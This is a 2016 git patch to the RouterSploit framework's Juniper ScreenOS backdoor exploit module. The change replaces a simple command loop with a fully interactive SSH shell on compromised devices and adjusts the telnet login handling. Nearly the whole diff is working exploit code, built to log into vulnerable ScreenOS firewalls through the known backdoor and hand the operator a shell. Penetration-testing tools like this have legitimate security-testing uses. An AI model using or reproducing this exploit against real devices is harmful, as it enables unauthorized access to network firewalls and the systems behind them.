From a098d4c5c6238a3fdf8d69b4f87ae323883d043d Mon Sep 17 00:00:00 2001
From: lucyoa <marcin.bury@reverse-shell.com>
Date: Mon, 9 May 2016 14:34:32 +0100
Subject: [PATCH] Juniper ScreenOS backdoor exploit fix.

---
 .../exploits/juniper/screenos_backdoor.py     | 48 +++++++++++++++----
 1 file changed, 39 insertions(+), 9 deletions(-)

diff --git a/routersploit/modules/exploits/juniper/screenos_backdoor.py b/routersploit/modules/exploits/juniper/screenos_backdoor.py
index 12b376c4a..3a3ceba23 100644
--- a/routersploit/modules/exploits/juniper/screenos_backdoor.py
+++ b/routersploit/modules/exploits/juniper/screenos_backdoor.py
@@ -1,5 +1,5 @@
-import paramiko
 import telnetlib
+import paramiko, StringIO, termios, tty, sys, select, socket
 
 from routersploit import (
     exploits,
@@ -45,22 +45,51 @@ def run(self):
         else:
             print_success("SSH - Successful authentication")
 
-            cmd = ""
-            while cmd not in ["quit", "exit"]:
-                cmd = raw_input("> ")
-                stdin, stdout, stderr = ssh.exec_command(cmd.strip())
-                print stdout.channel.recv(2048)
-            return
+            chan = ssh.invoke_shell()
+            oldtty = termios.tcgetattr(sys.stdin)
+            try:
+                tty.setraw(sys.stdin.fileno())
+                tty.setcbreak(sys.stdin.fileno())
+                chan.settimeout(0.0)
+
+                while(True):
+                    r, w, e = select.select([chan, sys.stdin], [], [])
+                    if(chan in r):
+                        try:
+                            x = unicode(chan.recv(1024))
+
+                            if(len(x) == 0):
+                                sys.stdout.write('\r\nExiting...\r\n')
+                                break
+
+                            sys.stdout.write(x)
+                            sys.stdout.flush()
+
+                        except socket.timeout:
+                            pass
+
+                    if(sys.stdin in r):
+                        x = sys.stdin.read(1)
+
+                        if(len(x) == 0):
+                            break
+
+                        chan.send(x)
+
+            finally:
+                termios.tcsetattr(sys.stdin, termios.TCSADRAIN, oldtty)
+                return
 
         try:
             tn = telnetlib.Telnet(self.target, 23)
+            tn.write("\r\n")
             tn.expect(["Login: ", "login: "], 5)
             tn.write(self.username + "\r\n")
             tn.expect(["Password: ", "password"], 5)
             tn.write(self.password + "\r\n")
             tn.write("\r\n")
 
-            (i, obj, res) = tn.expect(["Incorrect", "incorrect"], 5)
+            (i, obj, res) = tn.expect(["Failed", "failed"], 5)
 
             if i != -1:
                 return False
@@ -88,13 +117,14 @@ def check(self):
 
         try:
             tn = telnetlib.Telnet(self.target, 23)
+            tn.write("\r\n")
             tn.expect(["Login: ", "login: "], 5)
             tn.write(self.username + "\r\n")
             tn.expect(["Password: ", "password"], 5)
             tn.write(self.password + "\r\n")
             tn.write("\r\n")
 
-            (i, obj, res) = tn.expect(["Incorrect", "incorrect"], 5)
+            (i, obj, res) = tn.expect(["Failed", "failed"], 5)
             tn.close()
 
             if i != -1: